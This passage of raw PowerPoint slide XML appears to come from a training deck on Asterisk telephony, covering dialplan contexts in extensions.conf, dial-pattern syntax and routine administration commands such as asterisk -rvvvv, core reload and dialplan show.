              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4090" name="Google Shape;4090;p665"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4445974" y="2422475"/>
            <a:ext cx="2301000" cy="23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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dialedNumber</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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4" name="Shape 4094"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4095" name="Google Shape;4095;p666"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="423788" y="2749750"/>
            <a:ext cx="26274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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.conf</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4096" name="Google Shape;4096;p666"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1954175" y="361800"/>
            <a:ext cx="5087700" cy="51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Call Flow cont… </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4097" name="Google Shape;4097;p666"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6822699" y="170275"/>
            <a:ext cx="2228449" cy="635225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4098" name="Google Shape;4098;p666"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585950" y="3481775"/>
            <a:ext cx="8258100" cy="7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FE6700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dialplan contains logical sections of matches called ‘Context’, and each channel send call into the dialplan with a contextName and dialed number.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="FE6700"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4099" name="Google Shape;4099;p666"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1023763" y="1641613"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4100" name="Google Shape;4100;p666"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532150" y="1097600"/>
            <a:ext cx="1875600" cy="3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E6700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Step 2</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FE6700"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4101" name="Google Shape;4101;p666"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2236588" y="2251200"/>
            <a:ext cx="753900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="D63200"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4102" name="Google Shape;4102;p666"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585950" y="2251200"/>
            <a:ext cx="627300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="D63200"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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6" name="Shape 4106"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4107" name="Google Shape;4107;p667"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271175" y="3099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Regular Expression</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4108" name="Google Shape;4108;p667"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1013775"/>
            <a:ext cx="8520600" cy="34164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1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004AAD"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All regular expression start with “_” in dail examinations.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004AAD"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“X” means any number, “N” is any number other than 0 and 1.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004AAD"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“.” means any number of characters.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004AAD"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bracket represent groups, with standard “-” and “,” meanings ([1-9] or [0,1,2])</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004AAD"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example: _1410985012X is the same as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_1410985012[0-9]</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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2" name="Shape 4112"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4113" name="Google Shape;4113;p668"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271175" y="3099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Asterisk CLI commands</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4114" name="Google Shape;4114;p668"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="10137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2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sterisk -rvvvv </a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to the running instance of asterisk</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = verbosity</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>asterisk -cvvv</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c =  if asterisk is not running then restart and connect</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#systemctl status asterisk</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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8" name="Shape 4118"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4119" name="Google Shape;4119;p669"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271175" y="3099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Asterisk CLI commands</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4120" name="Google Shape;4120;p669"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1097600"/>
            <a:ext cx="8520600" cy="3332700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004AAD"/>
              </a:buClr>
              <a:buSzPts val="2300"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>core reload - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>oads all the asterisk configuration files</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004AAD"/>
              </a:buClr>
              <a:buSzPts val="2300"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pjsip reload - Reload the pjsip.conf file</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004AAD"/>
              </a:buClr>
              <a:buSzPts val="2300"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dialplan reload - Reload the dialplan file i.e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.conf</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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4" name="Shape 4124"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4125" name="Google Shape;4125;p670"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271175" y="3099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Asterisk CLI commands</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4126" name="Google Shape;4126;p670"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="176400" y="1011850"/>
            <a:ext cx="49587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600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;dialplan show &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ContextName/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DialPlanName&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;dialplan show MyFirstDialPlan</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dial Plans/Context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are saved in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.conf with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>square bracket</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
